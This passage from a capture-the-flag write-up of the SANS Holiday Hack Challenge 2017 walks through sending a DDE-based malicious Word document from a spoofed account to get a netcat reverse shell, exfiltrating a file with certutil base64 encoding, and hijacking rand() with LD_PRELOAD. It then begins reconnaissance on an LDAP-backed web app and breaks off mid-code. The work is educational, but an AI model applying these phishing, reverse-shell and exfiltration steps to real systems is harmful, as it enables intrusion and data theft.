&amp;quot;gingerbread cookie recipe&amp;quot;, please send it to me in a docx file. Im
currently working on my computer and would &lt;em&gt;totally download that to my
machine, open it, and click to all the prompts&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;Alabaster Snowball.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Oh, Alabaster, your gluttony will be your downfall. Now let's see how to
deliver our payload:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;From:&lt;/strong&gt; &lt;a class="reference external" href="mailto:minty.candycane&amp;#64;northpolechristmastown.com"&gt;minty.candycane&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;To:&lt;/strong&gt; &lt;a class="reference external" href="mailto:all&amp;#64;northpolechristmastown.com"&gt;all&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Subject:&lt;/strong&gt; Should we be worried?&lt;/p&gt;
&lt;p&gt;Hey Alabaster,&lt;/p&gt;
&lt;p&gt;You know I'm a novice security enthusiast, well I saw an article a while
ago about regarding DDE exploits that dont need macros for MS word to
get command execution.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/"&gt;https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Should we be worried about this?&lt;/p&gt;
&lt;p&gt;I tried it on my local machine and was able to transfer a file. Here's a
poc:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://mail.northpolechristmastown.com/attachments/dde_exmaple_minty_candycane.png"&gt;http://mail.northpolechristmastown.com/attachments/dde_exmaple_minty_candycane.png&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I know your the resident computer engineer here so I wanted to defer to
the expert.&lt;/p&gt;
&lt;p&gt;:)&lt;/p&gt;
&lt;p&gt;-Minty CandyCane.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;From:&lt;/strong&gt; &lt;a class="reference external" href="mailto:alabaster.snowball&amp;#64;northpolechristmastown.com"&gt;alabaster.snowball&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;To:&lt;/strong&gt; &lt;a class="reference external" href="mailto:all&amp;#64;northpolechristmastown.com"&gt;all&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Subject:&lt;/strong&gt; Re: Should we be worried?&lt;/p&gt;
&lt;p&gt;Quit worrying Minty,&lt;/p&gt;
&lt;p&gt;You have nothing to worry about with me around! I have developed most of
the applications in our network including our network defenses. We are
are completely secure and impenetrable.&lt;/p&gt;
&lt;p&gt;Sincerely,&lt;/p&gt;
&lt;p&gt;Alabaster Snowball.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Oh, Alabaster, your hubris will &lt;strong&gt;also&lt;/strong&gt; be your downfall. And finally, what
payload can we use:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;From:&lt;/strong&gt; &lt;a class="reference external" href="mailto:alabaster.snowball&amp;#64;northpolechristmastown.com"&gt;alabaster.snowball&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;To:&lt;/strong&gt; &lt;a class="reference external" href="mailto:all&amp;#64;northpolechristmastown.com"&gt;all&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Subject:&lt;/strong&gt; Re: Lost book page&lt;/p&gt;
&lt;p&gt;Well powershell is my new love but netcat will always hold a special
place in my heart.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;From:&lt;/strong&gt; &lt;a class="reference external" href="mailto:alabaster.snowball&amp;#64;northpolechristmastown.com"&gt;alabaster.snowball&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;To:&lt;/strong&gt; &lt;a class="reference external" href="mailto:all&amp;#64;northpolechristmastown.com"&gt;all&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Subject:&lt;/strong&gt; Re: Lost book page&lt;/p&gt;
&lt;p&gt;I installed nc.exe to path for my computer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Awesome, now we know that Alabaster has &lt;code&gt;nc.exe&lt;/code&gt; in his PATH. We can use
this tool to connect back to our Internet-facing machine, to get a shell access
to the Elf-Machine Interface server.&lt;/p&gt;
&lt;p&gt;Let's prepare our malicious .docx file, using the Sensepost tutorial:&lt;/p&gt;
&lt;img alt="ewa_malicious_docx.png" class="align-center" src="/images/sans-christmas-challenge-2017/ewa_malicious_docx.png" /&gt;
&lt;p&gt;Now, let's send our gingerbread cookie recipe to our dear Alabaster, from Mrs
Claus's account. We can do this by putting her email address in our cookie, as
explained in the EWA section:&lt;/p&gt;
&lt;img alt="ewa_phishing_email.png" class="align-center" src="/images/sans-christmas-challenge-2017/ewa_phishing_email.png" /&gt;
&lt;p&gt;And now, we wait for a shell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nc -knlvp &lt;span class="m"&gt;8080&lt;/span&gt;
&lt;span class="go"&gt;listening on [any] 8080 ...&lt;/span&gt;
&lt;span class="go"&gt;connect to [X.X.X.X] from (UNKNOWN) [35.185.57.190] 52783&lt;/span&gt;
&lt;span class="go"&gt;Microsoft Windows [Version 10.0.14393]&lt;/span&gt;
&lt;span class="go"&gt;(c) 2016 Microsoft Corporation. All rights reserved.&lt;/span&gt;

&lt;span class="go"&gt;C:\Users\alabaster_snowball\Documents&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Sweet! We have a shell access to the EMI machine. Now, the only thing to do is
to get the &lt;code&gt;C:\GreatBookPage7.pdf&lt;/code&gt; file. But how to exfiltrate?
Exfiltrating data from a Windows machine can be a pain, since there's no
useful tools like &lt;code&gt;scp&lt;/code&gt;, &lt;code&gt;curl&lt;/code&gt;, etc. (yet) to send data to the
outside.  One of my favourite tricks is to use the &lt;code&gt;certutil.exe&lt;/code&gt; command
tool.  This tool is used to manipulate certificates, etc., but &lt;a class="reference external" href="https://twitter.com/subtee/status/920425668084510721"&gt;it can be used
to base64-encode and -decode data&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So, what we'll do is simply base64 encode the page to a file. Then we'll output
the content of the file, copy/paste it to our machine, and base64-decode it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;C:\Users\alabaster_snowball\Documents&amp;gt; certutil.exe -f -encode C:\GreatBookPage7.pdf C:\Users\alabaster_snowball\Documents\GreatBookPage7.pdf.b64&lt;/span&gt;
&lt;span class="go"&gt;Input Length = 1053508&lt;/span&gt;
&lt;span class="go"&gt;Output Length = 1448634&lt;/span&gt;
&lt;span class="go"&gt;CertUtil: -encode command completed successfully.&lt;/span&gt;

&lt;span class="go"&gt;C:\Users\alabaster_snowball\Documents&amp;gt; type .\GreatBookPage7.pdf.b64&lt;/span&gt;
&lt;span class="go"&gt;-----BEGIN CERTIFICATE-----&lt;/span&gt;
&lt;span class="go"&gt;JVBERi0xLjMKJcTl8uXrp/Og0MTGCjUgMCBvYmoKPDwgL0xlbmd0aCA2IDAgUiAv&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;RU9GCg==&lt;/span&gt;
&lt;span class="go"&gt;-----END CERTIFICATE-----&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, on my machine (you must remove the &lt;code&gt;BEGIN CERTIFICATE&lt;/code&gt; and
&lt;code&gt;END CERTIFICATE&lt;/code&gt; from the output):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; base64 -d .&lt;span class="se"&gt;\G&lt;/span&gt;reatBookPage7.pdf.b64 &amp;gt; GreatBookPage7.pdf
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Which gives us the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2017/GreatBookPage7.pdf"&gt;seventh page of The Great Book&lt;/a&gt;
(sha256: &lt;code&gt;bc93c535481abb76e3c5180406ea9ea0910acd53f76cab788f1d680d21b611b5&lt;/code&gt;):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Regarding the Witches of Oz&lt;/p&gt;
&lt;p&gt;Of all the varied and amazing people who inhabit the Land of Oz, the
witches are among the most powerful, wielding potent magic and mesmerizing
spells. They travel through the air, propelled by bubbles or broomsticks.
Each witch has a very different attitude and outlook, ranging from faithful
friends who are dear to us all way down to hearts full of unwashed socks
and souls full of gunk.&lt;/p&gt;
&lt;p&gt;During the Great Schism, the witches very deliberately remained neutral,
siding with neither the Munchkins nor the Elves. The witches seem to live
exclusively in Oz, tending to their castles. As of this writing, the
witches have never been observed in the North Pole.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="who-is-behind-all-this"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id54"&gt;Who is behind all this?&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="north-pole-and-beyond-we-re-off-to-see-the"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id55"&gt;North Pole and Beyond: We're Off To See The...&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="id14"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id56"&gt;Cranberry Pi&lt;/a&gt;&lt;/h4&gt;
&lt;pre class="literal-block"&gt;
                 .--._.--.--.__.--.--.__.--.--.__.--.--._.--.
               _(_      _Y_      _Y_      _Y_      _Y_      _)_
              [___]    [___]    [___]    [___]    [___]    [___]
              /:' \    /:' \    /:' \    /:' \    /:' \    /:' \
             |::   |  |::   |  |::   |  |::   |  |::   |  |::   |
             \::.  /  \::.  /  \::.  /  \::.  /  \::.  /  \::.  /
         jgs  \::./    \::./    \::./    \::./    \::./    \::./
               '='      '='      '='      '='      '='      '='
Wunorse Openslae has a special challenge for you.
Run the given binary, make it return 42.
Use the partial source for hints, it is just a clue.
You will need to write your own code, but only a line or two.
&lt;/pre&gt;
&lt;p&gt;Alright, we have a program, and we need to make it return 42:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@ed587b205bb6:~$&lt;/span&gt; ls -lh
&lt;span class="go"&gt;total 100K&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root  83K Dec 16 16:56 isit42&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 root root  654 Dec 16 16:56 isit42.c.un&lt;/span&gt;
&lt;span class="gp"&gt;elf@ed587b205bb6:~$&lt;/span&gt; ./isit42
&lt;span class="go"&gt;Starting up ... done.&lt;/span&gt;
&lt;span class="go"&gt;Calling rand() to select a random number.&lt;/span&gt;
&lt;span class="go"&gt;170 is not 42.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, the program seems to generate a random number, using &lt;code&gt;rand()&lt;/code&gt;, and
compare the result to 42. If the random number is not equal to 42, the program
outputs an error. So, how can we force &lt;code&gt;rand&lt;/code&gt; to return 42?&lt;/p&gt;
&lt;p&gt;The common trick is to use &lt;code&gt;LD_PRELOAD&lt;/code&gt;. If this shell variable holds
the path to a shared library, this library will be loaded before any other
library, include &lt;code&gt;libc&lt;/code&gt;. The idea is to create our own library, with
our own version of &lt;code&gt;rand&lt;/code&gt; that, for example, always return 42. Luckily
for us, a &lt;a class="reference external" href="https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win"&gt;SANS blog post&lt;/a&gt;
was recently posted on the subject.&lt;/p&gt;
&lt;p&gt;The blog post focuses on the &lt;code&gt;usleep&lt;/code&gt; instead of &lt;code&gt;rand&lt;/code&gt;, but the
principle is the same. So, let's create our own &lt;code&gt;rand&lt;/code&gt; library!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@ed587b205bb6:~$&lt;/span&gt; cat &lt;span class="s"&gt;&amp;lt;&amp;lt;EOF &amp;gt; hijack_rand.c&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt; int rand()&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt; {&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt;     return 42;&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt; }&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt;&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s"&gt; EOF&lt;/span&gt;
&lt;span class="gp"&gt;elf@ed587b205bb6:~$&lt;/span&gt; cat hijack_rand.c
&lt;span class="go"&gt;int rand()&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    return 42;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="gp"&gt;elf@ed587b205bb6:~$&lt;/span&gt; gcc -o hijack_rand.so -shared -fPIC ./hijack_rand.c
&lt;span class="gp"&gt;elf@ed587b205bb6:~$&lt;/span&gt; &lt;span class="nv"&gt;LD_PRELOAD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;./hijack_rand.so&amp;quot;&lt;/span&gt; ./isit42
&lt;span class="go"&gt;Starting up ... done.&lt;/span&gt;
&lt;span class="go"&gt;Calling rand() to select a random number.&lt;/span&gt;
&lt;span class="go"&gt;                 .-.&lt;/span&gt;
&lt;span class="go"&gt;                .;;\ ||           _______  __   __  _______    _______  __    _  _______  _     _  _______  ______&lt;/span&gt;
&lt;span class="go"&gt;               /::::\|/          |       ||  | |  ||       |  |   _   ||  |  | ||       || | _ | ||       ||    _ |&lt;/span&gt;
&lt;span class="go"&gt;              /::::&amp;#39;();          |_     _||  |_|  ||    ___|  |  |_|  ||   |_| ||  _____|| || || ||    ___||   | ||&lt;/span&gt;
&lt;span class="go"&gt;            |\/`\:_/`\/|           |   |  |       ||   |___   |       ||       || |_____ |       ||   |___ |   |_||_&lt;/span&gt;
&lt;span class="go"&gt;        ,__ |0_..().._0| __,       |   |  |       ||    ___|  |       ||  _    ||_____  ||       ||    ___||    __  |&lt;/span&gt;
&lt;span class="go"&gt;         \,`////&amp;quot;&amp;quot;&amp;quot;&amp;quot;\\\\`,/        |   |  |   _   ||   |___   |   _   || | |   | _____| ||   _   ||   |___ |   |  | |&lt;/span&gt;
&lt;span class="go"&gt;         | )//_ o  o _\\( |        |___|  |__| |__||_______|  |__| |__||_|  |__||_______||__| |__||_______||___|  |_|&lt;/span&gt;
&lt;span class="go"&gt;          \/|(_) () (_)|\/&lt;/span&gt;
&lt;span class="go"&gt;            \   &amp;#39;()&amp;#39;   /            ______    _______  _______  ___      ___      __   __    ___   _______&lt;/span&gt;
&lt;span class="go"&gt;            _:.______.;_           |    _ |  |       ||   _   ||   |    |   |    |  | |  |  |   | |       |&lt;/span&gt;
&lt;span class="go"&gt;          /| | /`\/`\ | |\         |   | ||  |    ___||  |_|  ||   |    |   |    |  |_|  |  |   | |  _____|&lt;/span&gt;
&lt;span class="go"&gt;         / | | \_/\_/ | | \        |   |_||_ |   |___ |       ||   |    |   |    |       |  |   | | |_____&lt;/span&gt;
&lt;span class="go"&gt;        /  |o`&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;`o|  \       |    __  ||    ___||       ||   |___ |   |___ |_     _|  |   | |_____  |&lt;/span&gt;
&lt;span class="go"&gt;       `.__/     ()     \__.&amp;#39;      |   |  | ||   |___ |   _   ||       ||       |  |   |    |   |  _____| |&lt;/span&gt;
&lt;span class="go"&gt;       |  | ___      ___ |  |      |___|  |_||_______||__| |__||_______||_______|  |___|    |___| |_______|&lt;/span&gt;
&lt;span class="go"&gt;       /  \|---|    |---|/  \&lt;/span&gt;
&lt;span class="go"&gt;       |  (|42 | () | DA|)  |       _   ___  _______&lt;/span&gt;
&lt;span class="go"&gt;       \  /;---&amp;#39;    &amp;#39;---;\  /      | | |   ||       |&lt;/span&gt;
&lt;span class="go"&gt;        `` \ ___ /\ ___ / ``       | |_|   ||____   |&lt;/span&gt;
&lt;span class="go"&gt;            `|  |  |  |`           |       | ____|  |&lt;/span&gt;
&lt;span class="go"&gt;      jgs    |  |  |  |            |___    || ______| ___&lt;/span&gt;
&lt;span class="go"&gt;       _._  |\|\/||\/|/|  _._          |   || |_____ |   |&lt;/span&gt;
&lt;span class="go"&gt;      / .-\ |~~~~||~~~~| /-. \         |___||_______||___|&lt;/span&gt;
&lt;span class="go"&gt;      | \__.&amp;#39;    ||    &amp;#39;.__/ |&lt;/span&gt;
&lt;span class="go"&gt;       `---------&amp;#39;&amp;#39;---------`&lt;/span&gt;
&lt;span class="go"&gt;Congratulations! You&amp;#39;ve won, and have successfully completed this challenge.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id15"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id57"&gt;Redirecting the snowball&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Here's the layout I used to solve this level (I know, I got suuuper lazy, but
God bless this portal):&lt;/p&gt;
&lt;img alt="we_re_off_to_see_the_snowball.gif" class="align-center" src="/images/sans-christmas-challenge-2017/we_re_off_to_see_the_snowball.gif" /&gt;
&lt;p&gt;Having completed this level, we have a little chat with a certain someone:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Glinda the Good Witch:&lt;/strong&gt; It's me, Glinda the Good Witch of Oz! You found
me and ruined my genius plan!&lt;/p&gt;
&lt;p&gt;You see, I cast a magic spell on the Abominable Snow Monster to make him
throw all the snowballs at the North Pole. Why? Because I knew a giant
snowball fight would stir up hostilities between the Elves and the
Munchkins, resulting in all-out WAR between Oz and the North Pole. I was
going to sell my magic and spells to both sides. War profiteering would
mean GREAT business for me.&lt;/p&gt;
&lt;p&gt;But, alas, you and your sleuthing foiled my venture. And I would have
gotten away with it too, if it weren't for you meddling kids!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My, oh my, what a nasty plan!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="north-pole-christmas-town-infrastructure-elf-database"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id58"&gt;North Pole Christmas Town infrastructure: Elf Database&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;On to the last application, the Elf Database. Given the name, we can expect the
application to be some sort of web interface allowing us to have access to the
list of North Pole's elves.&lt;/p&gt;
&lt;p&gt;Once again, if we try to connect using Alabaster's account, we get an
&lt;code&gt;Incorrect username or password!&lt;/code&gt; error.&lt;/p&gt;
&lt;img alt="edb_login_fail.png" class="align-center" src="/images/sans-christmas-challenge-2017/edb_login_fail.png" /&gt;
&lt;p&gt;So, let's see what we can find from basic recon. Once again, we get some
information by taking a look at the &lt;code&gt;robots.txt&lt;/code&gt; file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/robots.txt&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SESSION=5A0K85HFazf2m0ltjg3g&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sun, 07 Jan 2018 23:02:46 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/plain; charset=utf-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Last-Modified&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Tue, 15 Aug 2017 04:58:06 GMT&lt;/span&gt;

User-agent: *
Disallow: /dev
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, there is a &lt;code&gt;/dev&lt;/code&gt; directory. If we browse to it, we find only one
file, &lt;code&gt;LDIF_template.txt&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/dev/LDIF_template.txt&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;edb.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;Upgrade-Insecure-Requests&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SESSION=5A0K85HFazf2m0ltjg3g&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sun, 07 Jan 2018 23:04:47 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/plain; charset=utf-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;751&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Ranges&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;bytes&lt;/span&gt;

#LDAP LDIF TEMPLATE

dn: dc=com
dc: com
objectClass: dcObject

dn: dc=northpolechristmastown,dc=com
dc: northpolechristmastown
objectClass: dcObject
objectClass: organization

dn: ou=human,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: human

dn: ou=elf,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: elf

dn: ou=reindeer,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: reindeer

dn: cn= ,ou= ,dc=northpolechristmastown,dc=com
objectClass: addressbookPerson
cn:
sn:
gn:
profilePath: /path/to/users/profile/image
uid:
ou:
department:
mail:
telephoneNumber:
street:
postOfficeBox:
postalCode:
postalAddress:
st:
l:
c:
facsimileTelephoneNumber:
description:
&lt;span class="hll"&gt;userPassword:
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This gives us some info about how the Elf Database application functions.
There's obviously an LDAP backend. We also have the list of attributes for the
object representing the users, including one which seems particularly juicy,
&lt;code&gt;userPassword&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Learning that the application uses an LDAP backend, I tried to bypass
authentication using LDAP injection, but it did not work. So, let's take a look
at the source code of the application. Here's what we can find on the
&lt;code&gt;index.html&lt;/code&gt; page:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;cookie&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nb"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;location&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;href&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;            &lt;span class="nx"&gt;token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;localStorage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getItem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;np-auth&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;token&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;                &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/login&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;auth_token&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;token&lt;/span&gt; &lt;span class="p"&gt;}).&lt;/span&gt;&lt;span class="nx"&gt;done&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
